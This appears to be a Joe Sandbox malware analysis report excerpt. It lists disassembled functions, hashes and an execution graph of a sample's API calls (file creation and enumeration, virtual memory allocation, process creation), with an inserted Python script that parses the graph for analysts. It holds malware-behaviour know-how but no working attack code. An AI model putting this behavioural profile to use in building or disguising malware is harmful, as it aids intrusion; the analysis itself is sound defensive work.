                • Instruction ID: 04251001989a726659648199eed39d7281b497d777eb0c8a148d7f8d86487591
                • Opcode Fuzzy Hash: eefde04eeb2ee4b7bde99f48d26f99f867ec1b14e21a12342dfef7bdf5a4474d
                • Instruction Fuzzy Hash: 5251497191820697E7127A2CC90536FFFD4EB40710F24C99CE7D58B39DEB7484958B46
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID: 0$Flst
                • API String ID: 0-758220159
                • Opcode ID: 35807502228855cecbaf48c2cf69d69c25eb6acad6a909dbca56a37fd103ed48
                • Instruction ID: 05df29bf065aeab311ff3ae0edb10a90414fa5cef7ee3b95c8f8f144728ba3be
                • Opcode Fuzzy Hash: 35807502228855cecbaf48c2cf69d69c25eb6acad6a909dbca56a37fd103ed48
                • Instruction Fuzzy Hash: 30519DB1E00218CBDF26CF99C588669FBF5FF48318F14806AD64ADB251E7759981CB80
                APIs
                • RtlDebugPrintTimes.NTDLL ref: 017DD959
                  • Part of subcall function 017B4859: RtlDebugPrintTimes.NTDLL ref: 017B48F7
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $$$
                • API String ID: 3446177414-233714265
                • Opcode ID: 426d154bf97ae2beb9259b0c310ca53e39c029ea2bb29229f967697834f92340
                • Instruction ID: 015771cc084150e9f1268b046e4b90fe1611c92185216a99dc5026c1e76c3178
                • Opcode Fuzzy Hash: 426d154bf97ae2beb9259b0c310ca53e39c029ea2bb29229f967697834f92340
                • Instruction Fuzzy Hash: 2951EF71E4434A9FEB31DFA8C48979DFBB2BB48304F644069C505AB289D775AA85CF80
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0183CFBD
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: 3a765c24ea19eb0a14f66c99adfd13c0b8376f8e2ca93250bfc0a5e20d586818
                • Instruction ID: 4fcb83047f21abfeba61e502f124767de895708e1b0e428d15c849466450eb25
                • Opcode Fuzzy Hash: 3a765c24ea19eb0a14f66c99adfd13c0b8376f8e2ca93250bfc0a5e20d586818
                • Instruction Fuzzy Hash: A141B371900215DFDB219F99C844AAEFBB8FF94B40F54412EE914DB354D774DA01CB91
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $
                • API String ID: 3446177414-3993045852
                • Opcode ID: c7bc1b42a63e77438bda4c4215b04ca135a552882c8eda90d47e03185496087f
                • Instruction ID: 6d4afaabdc52aef4b5851205882aa9917d683c9620c41de0f193366f4ecd580d
                • Opcode Fuzzy Hash: c7bc1b42a63e77438bda4c4215b04ca135a552882c8eda90d47e03185496087f
                • Instruction Fuzzy Hash: B6417179A00219ABDF12DF9DD880AEEBBB5FF48704F140119EE04AB341D7719E55CB90
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: 0$0
                • API String ID: 3446177414-203156872
                • Opcode ID: dac536ea437acfe71766e0b37f4d7dc3f43fa05ba0db60e91c01c5e9a30459ab
                • Instruction ID: b0281fb03a482adf9e28d842b2db172a39f52fce659a11ed41f6fff5c62e4fee
                • Opcode Fuzzy Hash: dac536ea437acfe71766e0b37f4d7dc3f43fa05ba0db60e91c01c5e9a30459ab
                • Instruction Fuzzy Hash: 1A416BB16087069FD311CF68C884A57BBE4BB88318F444A6EF988DB341D771EA05CB96

                Execution Graph

                Execution Coverage:2.6%
                Dynamic/Decrypted Code Coverage:4.1%
                Signature Coverage:1.5%
                Total number of Nodes:461
                Total number of Limit Nodes:74
                execution_graph 98512 d058d0 98513 d05934 98512->98513 98514 d0596b 98513->98514 98517 d010e0 98513->98517 98516 d0594d 98519 d01106 98517->98519 98518 d011e1 98518->98516 98519->98518 98520 d01270 98519->98520 98521 d01285 98519->98521 98522 d092d0 NtClose 98520->98522 98529 d092d0 98521->98529 98524 d01279 98522->98524 98524->98516 98525 d012c5 98525->98516 98526 d0128e 98526->98525 98532 d0b370 98526->98532 98530 d092ea 98529->98530 98531 d092fb NtClose 98530->98531 98531->98526 98535 d09630 98532->98535 98534 d012b9 98534->98516 98536 d0964a 98535->98536 98537 d0965b RtlFreeHeap 98536->98537 98537->98534 98538 d08fd0 98539 d09087 98538->98539 98541 d08fff 98538->98541 98540 d0909d NtCreateFile 98539->98540 98547 d0c590 98548 d0b370 RtlFreeHeap 98547->98548 98549 d0c5a5 98548->98549 98550 cf9b47 98551 cf9b5e 98550->98551 98553 cf9b63 98550->98553 98552 cf9b98 98553->98552 98554 d0b370 RtlFreeHeap 98553->98554 98554->98552 98557 ce9c00 98559 ce9fe7 98557->98559 98558 cea3cc 98559->98558 98561 d0afd0 98559->98561 98562 d0aff6 98561->98562 98567 ce4200 98562->98567 98564 d0b002 98566 d0b03b 98564->98566 98570 d05540 98564->98570 98566->98558 98574 cf3130 98567->98574 98569 ce420d 98569->98564 98571 d055a2 98570->98571 98573 d055af 98571->98573 98592 cf1920 98571->98592 98573->98566 98575 cf314d 98574->98575 98577 cf3166 98575->98577 98578 d09d10 98575->98578 98577->98569 98580 d09d2a 98578->98580 98579 d09d59 98579->98577 98580->98579 98585 d08900 98580->98585 98583 d0b370 RtlFreeHeap 98584 d09dcc 98583->98584 98584->98577 98586 d0891d 98585->98586 98589 36a2c0a 98586->98589 98587 d08949 98587->98583 98590 36a2c1f LdrInitializeThunk 98589->98590 98591 36a2c11 98589->98591 98590->98587 98591->98587 98593 cf195b 98592->98593 98608 cf7dd0 98593->98608 98595 cf1963 98596 cf1c30 98595->98596 98619 d0b450 98595->98619 98596->98573 98598 cf1979 98599 d0b450 RtlAllocateHeap 98598->98599 98600 cf198a 98599->98600 98601 d0b450 RtlAllocateHeap 98600->98601 
98602 cf1998 98601->98602 98605 cf1a2c 98602->98605 98630 cf6930 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98602->98630 98622 cf4470 98605->98622 98606 cf1be2 98626 d07e80 98606->98626 98609 cf7dfc 98608->98609 98631 cf7cc0 98609->98631 98612 cf7e29 98614 d092d0 NtClose 98612->98614 98616 cf7e34 98612->98616 98613 cf7e41 98615 d092d0 NtClose 98613->98615 98617 cf7e5d 98613->98617 98614->98616 98618 cf7e53 98615->98618 98616->98595 98617->98595 98618->98595 98642 d095e0 98619->98642 98621 d0b46b 98621->98598 98623 cf4494 98622->98623 98624 cf449b 98623->98624 98625 cf44d0 LdrLoadDll 98623->98625 98624->98606 98625->98624 98627 d07ee2 98626->98627 98629 d07eef 98627->98629 98645 cf1c40 98627->98645 98629->98596 98630->98605 98632 cf7cda 98631->98632 98636 cf7db6 98631->98636 98637 d089a0 98632->98637 98635 d092d0 NtClose 98635->98636 98636->98612 98636->98613 98638 d089bd 98637->98638 98641 36a35c0 LdrInitializeThunk 98638->98641 98639 cf7daa 98639->98635 98641->98639 98643 d095fd 98642->98643 98644 d0960e RtlAllocateHeap 98643->98644 98644->98621 98661 cf80a0 98645->98661 98647 cf21a5 98647->98629 98648 cf1c60 98648->98647 98665 d01070 98648->98665 98651 cf1e6f 98673 d0c660 98651->98673 98652 cf1cbb 98652->98647 98668 d0c530 98652->98668 98655 cf1e84 98657 cf1ed1 98655->98657 98679 cf0770 98655->98679 98657->98647 98658 cf0770 LdrInitializeThunk 98657->98658 98682 cf8040 98657->98682 98658->98657 98659 cf2023 98659->98657 98660 cf8040 LdrInitializeThunk 98659->98660 98660->98659 98662 cf80ad 98661->98662 98663 cf80ce SetErrorMode 98662->98663 98664 cf80d5 98662->98664 98663->98664 98664->98648 98686 d0b2e0 98665->98686 98667 d01091 98667->98652 98669 d0c540 98668->98669 98670 d0c546 98668->98670 98669->98651 98671 d0b450 RtlAllocateHeap 98670->98671 98672 d0c56c 98671->98672 98672->98651 98674 d0c5d0 98673->98674 98675 d0b450 RtlAllocateHeap 98674->98675 98676 d0c62d 98674->98676 98677 d0c60a 98675->98677 98676->98655 98678 d0b370 RtlFreeHeap 
98677->98678 98678->98676 98680 cf0792 98679->98680 98693 d09550 98679->98693 98680->98659 98683 cf8053 98682->98683 98698 d08800 98683->98698 98685 cf807e 98685->98657 98689 d09430 98686->98689 98688 d0b311 98688->98667 98690 d094c5 98689->98690 98692 d0945b 98689->98692 98691 d094db NtAllocateVirtualMemory 98690->98691 98691->98688 98692->98688 98694 d0956d 98693->98694 98697 36a2c70 LdrInitializeThunk 98694->98697 98695 d09595 98695->98680 98697->98695 98699 d08881 98698->98699 98701 d0882e 98698->98701 98703 36a2dd0 LdrInitializeThunk 98699->98703 98700 d088a6 98700->98685 98701->98685 98703->98700 98704 cf5ac0 98705 cf8040 LdrInitializeThunk 98704->98705 98706 cf5af0 98705->98706 98709 cf7fc0 98706->98709 98708 cf5b15 98710 cf8004 98709->98710 98711 cf8025 98710->98711 98716 d085d0 98710->98716 98711->98708 98713 cf8015 98714 cf8031 98713->98714 98715 d092d0 NtClose 98713->98715 98714->98708 98715->98711 98717 d08650 98716->98717 98718 d085fe 98716->98718 98721 36a4650 LdrInitializeThunk 98717->98721 98718->98713 98719 d08675 98719->98713 98721->98719 98722 cfac80 98727 cfa990 98722->98727 98724 cfac8d 98741 cfa610 98724->98741 98726 cfaca9 98728 cfa9b5 98727->98728 98752 cf82b0 98728->98752 98731 cfab03 98731->98724 98733 cfab1a 98733->98724 98734 cfab11 98734->98733 98736 cfac07 98734->98736 98771 cfa060 98734->98771 98738 cfac6a 98736->98738 98780 cfa3d0 98736->98780 98739 d0b370 RtlFreeHeap 98738->98739 98740 cfac71 98739->98740 98740->98724 98742 cfa622 98741->98742 98749 cfa62d 98741->98749 98743 d0b450 RtlAllocateHeap 98742->98743 98743->98749 98744 cfa650 98744->98726 98745 cf82b0 GetFileAttributesW 98745->98749 98746 cfa962 98747 cfa977 98746->98747 98748 d0b370 RtlFreeHeap 98746->98748 98747->98726 98748->98747 98749->98744 98749->98745 98749->98746 98750 cfa060 RtlFreeHeap 98749->98750 98751 cfa3d0 RtlFreeHeap 98749->98751 98750->98749 98751->98749 98753 cf82d1 98752->98753 98754 cf82e3 98753->98754 98755 cf82d8 GetFileAttributesW 98753->98755 
98754->98731 98756 d032c0 98754->98756 98755->98754 98757 d032ce 98756->98757 98758 d032d5 98756->98758 98757->98734 98759 cf4470 LdrLoadDll 98758->98759 98760 d0330a 98759->98760 98761 d03319 98760->98761 98784 d02d80 LdrLoadDll 98760->98784 98763 d0b450 RtlAllocateHeap 98761->98763 98767 d034c4 98761->98767 98764 d03332 98763->98764 98765 d034ba 98764->98765 98764->98767 98768 d0334e 98764->98768 98766 d0b370 RtlFreeHeap 98765->98766 98765->98767 98766->98767 98767->98734 98768->98767 98769 d0b370 RtlFreeHeap 98768->98769 98770 d034ae 98769->98770 98770->98734 98772 cfa086 98771->98772 98785 cfdaa0 98772->98785 98774 cfa0f8 98776 cfa280 98774->98776 98778 cfa116 98774->98778 98775 cfa265 98775->98734 98776->98775 98777 cf9f20 RtlFreeHeap 98776->98777 98777->98776 98778->98775 98790 cf9f20 98778->98790 98781 cfa3f6 98780->98781 98782 cfdaa0 RtlFreeHeap 98781->98782 98783 cfa47d 98782->98783 98783->98736 98784->98761 98786 cfdac4 98785->98786 98787 cfdace 98786->98787 98788 d0b370 RtlFreeHeap 98786->98788 98787->98774 98789 cfdb11 98788->98789 98789->98774 98791 cf9f3d 98790->98791 98794 cfdb20 98791->98794 98793 cfa043 98793->98778 98795 cfdb44 98794->98795 98796 cfdbee 98795->98796 98797 d0b370 RtlFreeHeap 98795->98797 98796->98793 98797->98796 98798 cf7080 98799 cf709c 98798->98799 98803 cf70ef 98798->98803 98801 d092d0 NtClose 98799->98801 98799->98803 98800 cf7224 98802 cf70b7 98801->98802 98808 cf6460 NtClose LdrInitializeThunk LdrInitializeThunk 98802->98808 98803->98800 98809 cf6460 NtClose LdrInitializeThunk LdrInitializeThunk 98803->98809 98805 cf71fe 98805->98800 98810 cf6630 NtClose LdrInitializeThunk LdrInitializeThunk 98805->98810 98808->98803 98809->98805 98810->98800 98811 cf21c0 98812 d08900 LdrInitializeThunk 98811->98812 98813 cf21f6 98812->98813 98816 d09360 98813->98816 98815 cf220b 98817 d093f2 98816->98817 98818 d0938e 98816->98818 98821 36a2e80 LdrInitializeThunk 98817->98821 98818->98815 98819 d09423 98819->98815 98821->98819 98822 cf2698 
98823 cf26b5 98822->98823 98826 cf61d0 98823->98826 98825 cf26c0 98827 cf6203 98826->98827 98828 cf6227 98827->98828 98833 d08e40 98827->98833 98828->98825 98830 cf624a 98830->98828 98831 d092d0 NtClose 98830->98831 98832 cf62ca 98831->98832 98832->98825 98834 d08e5a 98833->98834 98837 36a2ca0 LdrInitializeThunk 98834->98837 98835 d08e86 98835->98830 98837->98835 98839 ceb490 98840 d0b2e0 NtAllocateVirtualMemory 98839->98840 98841 cecb01 98839->98841 98840->98841 98842 d088b0 98843 d088cd 98842->98843 98846 36a2df0 LdrInitializeThunk 98843->98846 98844 d088f5 98846->98844 98847 d00070 98848 d0008d 98847->98848 98849 cf4470 LdrLoadDll 98848->98849 98850 d000ab 98849->98850 98851 d09230 98852 d092a7 98851->98852 98853 d0925b 98851->98853 98854 d092bd NtDeleteFile 98852->98854 98855 d01a30 98860 d01a49 98855->98860 98856 d01ad9 98857 d01a91 98858 d0b370 RtlFreeHeap 98857->98858 98859 d01aa1 98858->98859 98860->98856 98860->98857 98861 d01ad4 98860->98861 98862 d0b370 RtlFreeHeap 98861->98862 98862->98856 98863 d05fb0 98864 d0600a 98863->98864 98866 d06017 98864->98866 98867 d039d0 98864->98867 98868 d0b2e0 NtAllocateVirtualMemory 98867->98868 98869 d03a11 98868->98869 98870 cf4470 LdrLoadDll 98869->98870 98872 d03b1e 98869->98872 98873 d03a57 98870->98873 98871 d03aa0 Sleep 98871->98873 98872->98866 98873->98871 98873->98872 98874 d08730 98875 d087c2 98874->98875 98877 d0875e 98874->98877 98879 36a2ee0 LdrInitializeThunk 98875->98879 98876 d087f3 98879->98876 98880 d01231 98892 d09140 98880->98892 98882 d01252 98883 d01270 98882->98883 98884 d01285 98882->98884 98885 d092d0 NtClose 98883->98885 98886 d092d0 NtClose 98884->98886 98887 d01279 98885->98887 98889 d0128e 98886->98889 98888 d012c5 98889->98888 98890 d0b370 RtlFreeHeap 98889->98890 98891 d012b9 98890->98891 98893 d091e7 98892->98893 98895 d0916b 98892->98895 98894 d091fd NtReadFile 98893->98894 98894->98882 98895->98882 98896 ce9ba0 98897 ce9baf 98896->98897 98898 ce9bf0 98897->98898 98899 ce9bdd 
CreateThread 98897->98899 98900 cf0ce0 98901 cf0ce1 98900->98901 98902 cf4470 LdrLoadDll 98901->98902 98903 cf0d18 98902->98903 98904 cf0d4c PostThreadMessageW 98903->98904 98905 cf0d5d 98903->98905 98904->98905 98906 cf6ca0 98907 cf6cca 98906->98907 98910 cf7e70 98907->98910 98909 cf6cf4 98911 cf7e8d 98910->98911 98917 d089f0 98911->98917 98913 cf7edd 98914 cf7ee4 98913->98914 98922 d08ad0 98913->98922 98914->98909 98916 cf7f0d 98916->98909 98918 d08a8b 98917->98918 98920 d08a1b 98917->98920 98927 36a2f30 LdrInitializeThunk 98918->98927 98919 d08ac4 98919->98913 98920->98913 98923 d08b84 98922->98923 98924 d08b02 98922->98924 98928 36a2d10 LdrInitializeThunk 98923->98928 98924->98916 98925 d08bc9 98925->98916 98927->98919 98928->98925 98929 cf7260 98930 cf7278 98929->98930 98932 cf72d2 98929->98932 98930->98932 98933 cfb1b0 98930->98933 98934 cfb1d6 98933->98934 98935 cfb409 98934->98935 98960 d096c0 98934->98960 98935->98932 98937 cfb24c 98937->98935 98938 d0c660 2 API calls 98937->98938 98939 cfb26b 98938->98939 98939->98935 98940 cfb342 98939->98940 98941 d08900 LdrInitializeThunk 98939->98941 98943 cf5a40 LdrInitializeThunk 98940->98943 98945 cfb361 98940->98945 98942 cfb2cd 98941->98942 98942->98940 98948 cfb2d6 98942->98948 98943->98945 98944 cfb32a 98946 cf8040 LdrInitializeThunk 98944->98946 98949 cfb3f1 98945->98949 98967 d08470 98945->98967 98952 cfb338 98946->98952 98947 cfb308 98982 d046c0 LdrInitializeThunk 98947->98982 98948->98935 98948->98944 98948->98947 98963 cf5a40 98948->98963 98953 cf8040 LdrInitializeThunk 98949->98953 98952->98932 98956 cfb3ff 98953->98956 98955 cfb3c8 98972 d08520 98955->98972 98956->98932 98958 cfb3e2 98977 d08680 98958->98977 98961 d096dd 98960->98961 98962 d096ee CreateProcessInternalW 98961->98962 98962->98937 98964 cf5a55 98963->98964 98965 d08ad0 LdrInitializeThunk 98964->98965 98966 cf5a7e 98965->98966 98966->98947 98968 d084f0 98967->98968 98970 d0849e 98967->98970 98983 36a39b0 LdrInitializeThunk 98968->98983 98969 
d08515 98969->98955 98970->98955 98973 d0859d 98972->98973 98974 d0854b 98972->98974 98984 36a4340 LdrInitializeThunk 98973->98984 98974->98958 98975 d085c2 98975->98958 98978 d08700 98977->98978 98979 d086ae 98977->98979 98985 36a2fb0 LdrInitializeThunk 98978->98985 98979->98949 98980 d08725 98980->98949 98982->98944 98983->98969 98984->98975 98985->98980 98986 cfc520 98988 cfc549 98986->98988 98987 cfc64d 98988->98987 98989 cfc5f3 FindFirstFileW 98988->98989 98989->98987 98990 cfc60e 98989->98990 98991 cfc634 FindNextFileW 98990->98991 98991->98990 98992 cfc646 FindClose 98991->98992 98992->98987 99003 d016a0 99004 d016bc 99003->99004 99005 d016e4 99004->99005 99006 d016f8 99004->99006 99007 d092d0 NtClose 99005->99007 99008 d092d0 NtClose 99006->99008 99009 d016ed 99007->99009 99010 d01701 99008->99010 99013 d0b490 RtlAllocateHeap 99010->99013 99012 d0170c 99013->99012 99014 36a2ad0 LdrInitializeThunk 99015 cf3033 99016 cf7cc0 2 API calls 99015->99016 99017 cf3043 99016->99017 99018 d092d0 NtClose 99017->99018 99019 cf305f 99017->99019 99018->99019 99020 cff770 99021 cff7d4 99020->99021 99022 cf61d0 2 API calls 99021->99022 99024 cff907 99022->99024 99023 cff90e 99024->99023 99049 cf62e0 99024->99049 99026 cffab3 99027 cff98a 99027->99026 99028 cffac2 99027->99028 99053 cff550 99027->99053 99029 d092d0 NtClose 99028->99029 99031 cffacc 99029->99031 99032 cff9c6 99032->99028 99033 cff9d1 99032->99033 99034 d0b450 RtlAllocateHeap 99033->99034 99035 cff9fa 99034->99035 99036 cffa19 99035->99036 99037 cffa03 99035->99037 99062 cff440 CoInitialize 99036->99062 99039 d092d0 NtClose 99037->99039 99041 cffa0d 99039->99041 99040 cffa27 99065 d08da0 99040->99065 99043 cffaa2 99044 d092d0 NtClose 99043->99044 99045 cffaac 99044->99045 99046 d0b370 RtlFreeHeap 99045->99046 99046->99026 99047 cffa45 99047->99043 99048 d08da0 LdrInitializeThunk 99047->99048 99048->99047 99050 cf6305 99049->99050 99069 d08c20 99050->99069 99054 cff56c 99053->99054 99055 cf4470 LdrLoadDll 
99054->99055 99057 cff58a 99055->99057 99056 cff593 99056->99032 99057->99056 99058 cf4470 LdrLoadDll 99057->99058 99059 cff65e 99058->99059 99060 cf4470 LdrLoadDll 99059->99060 99061 cff6b8 99059->99061 99060->99061 99061->99032 99063 cff4a5 99062->99063 99064 cff53b CoUninitialize 99063->99064 99064->99040 99066 d08dba 99065->99066 99074 36a2ba0 LdrInitializeThunk 99066->99074 99067 d08dea 99067->99047 99070 d08c3a 99069->99070 99073 36a2c60 LdrInitializeThunk 99070->99073 99071 cf6379 99071->99027 99073->99071 99074->99067 99075 cf8730 99076 cf8721 99075->99076 99077 cf8735 99075->99077 99077->99076 99079 cf6ec0 LdrInitializeThunk LdrInitializeThunk 99077->99079 99079->99076
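                The execution_graph block above is the serialised form of the report's interactive call graph: "<id> <address>" declares a node (a function or basic block at that address), API names that follow a node are the calls the report attributes to it, "<a>-><b>" is a call edge between node ids, and "N API calls" appears to mark a node whose callee subgraph was collapsed. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that serialisation and lists, for every entry node (a node with no incoming edge), each API reachable through the graph, which is the quickest way to answer "what does the routine at this address end up calling?" across hundreds of nodes. The embedded excerpt is copied from the edge list above (a subset of it, labelled as such); the regular expressions, the function names and the "<N collapsed API calls>" label are this example's own assumptions about the format. Run on the excerpt it reproduces the report's finding that the routine at 0xcfc520 drives FindFirstFileW/FindNextFileW/FindClose, and that the cleanup path under 0xd058d0 reaches only NtClose and RtlFreeHeap.

```python
"""Parse a Joe Sandbox execution_graph edge list and report which NT/Win32
APIs each entry node can reach.  Added example; not Joe Sandbox code."""
import re
from collections import defaultdict

# Excerpt copied from the report's execution_graph block (a subset of the edges:
# the cleanup path under 0xd058d0, the file-enumeration routine at 0xcfc520,
# and one node carrying the report's "N API calls" annotation).
GRAPH_EXCERPT = """
98512 d058d0 98513 d05934 98512->98513 98514 d0596b 98513->98514 98517 d010e0
98513->98517 98516 d0594d 98519 d01106 98517->98519 98518 d011e1 98518->98516
98519->98518 98520 d01270 98519->98520 98521 d01285 98519->98521 98522 d092d0
NtClose 98520->98522 98529 d092d0 98521->98529 98524 d01279 98522->98524
98524->98516 98525 d012c5 98525->98516 98526 d0128e 98526->98525 98532 d0b370
98526->98532 98530 d092ea 98529->98530 98531 d092fb NtClose 98530->98531
98531->98526 98535 d09630 98532->98535 98534 d012b9 98534->98516 98536 d0964a
98535->98536 98537 d0965b RtlFreeHeap 98536->98537 98537->98534
98986 cfc520 98988 cfc549 98986->98988 98987 cfc64d 98988->98987 98989 cfc5f3
FindFirstFileW 98988->98989 98989->98987 98990 cfc60e 98989->98990 98991 cfc634
FindNextFileW 98990->98991 98991->98990 98992 cfc646 FindClose 98991->98992
98992->98987
98937 cfb24c 98938 d0c660 2 API calls 98937->98938 98939 cfb26b 98938->98939
"""

NODE_ID = re.compile(r"^\d{5,6}$")        # graph node id, e.g. 98512 (assumed width)
ADDRESS = re.compile(r"^[0-9a-f]{5,8}$")  # node address, e.g. d058d0
EDGE = re.compile(r"^(\d+)->(\d+)$")      # call edge caller->callee


def parse_execution_graph(text):
    """Return (addr_of, apis_of, succ).

    addr_of: node id -> address (int)
    apis_of: node id -> API names the report attached to that node
    succ:    node id -> set of callee node ids
    """
    tokens = text.split()
    addr_of, apis_of, succ = {}, defaultdict(list), defaultdict(set)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            succ[int(edge.group(1))].add(int(edge.group(2)))
            i += 1
        elif tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
            # "N API calls": the report collapsed N calls under this node.
            # The "<N collapsed API calls>" label is this example's own.
            apis_of[current].append(f"<{tok} collapsed API calls>")
            i += 3
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDRESS.match(tokens[i + 1]):
            current = int(tok)
            addr_of[current] = int(tokens[i + 1], 16)
            i += 2
        else:
            # Any other token is an API name attached to the last declared node.
            if current is not None and tok != "execution_graph":
                apis_of[current].append(tok)
            i += 1
    return addr_of, apis_of, succ


def reachable_apis(apis_of, succ, root):
    """Depth-first walk from root collecting every API on any reachable node."""
    seen, stack, found = set(), [root], set()
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        found.update(apis_of.get(node, []))
        stack.extend(succ.get(node, ()))
    return found


def summarize_roots(text):
    """Map each entry node's address (hex string) to its sorted reachable APIs."""
    addr_of, apis_of, succ = parse_execution_graph(text)
    callees = set().union(*succ.values()) if succ else set()
    roots = [n for n in addr_of if n not in callees]
    return {hex(addr_of[r]): sorted(reachable_apis(apis_of, succ, r)) for r in roots}


if __name__ == "__main__":
    for addr, apis in summarize_roots(GRAPH_EXCERPT).items():
        print(f"{addr}: {', '.join(apis) or '(no direct API calls)'}")
```

                To apply it to the full graph, paste the whole execution_graph block into GRAPH_EXCERPT; entry nodes then correspond to the functions the sandbox saw called from outside the instrumented region, and any address that appears in the report's own "APIs" entries (for example 00CFC604 inside 0xcfc520) can be matched against the node address nearest below it.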
                APIs
                • FindFirstFileW.KERNEL32(?,00000000), ref: 00CFC604
                • FindNextFileW.KERNEL32(?,00000010), ref: 00CFC63F
                • FindClose.KERNEL32(?), ref: 00CFC64A
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Find$File$CloseFirstNext
                • String ID:
                • API String ID: 3541575487-0
                • Opcode ID: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                • Instruction ID: 37b5d5c8614b01af940c1b4c2f1b48a628d46045c77302fb4a88f4cd998f20cd
                • Opcode Fuzzy Hash: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                • Instruction Fuzzy Hash: F031A171A0020CBBDB61DB64CD85FFF777CDF44744F144498BA18A7181EA70AB848BA1
                APIs
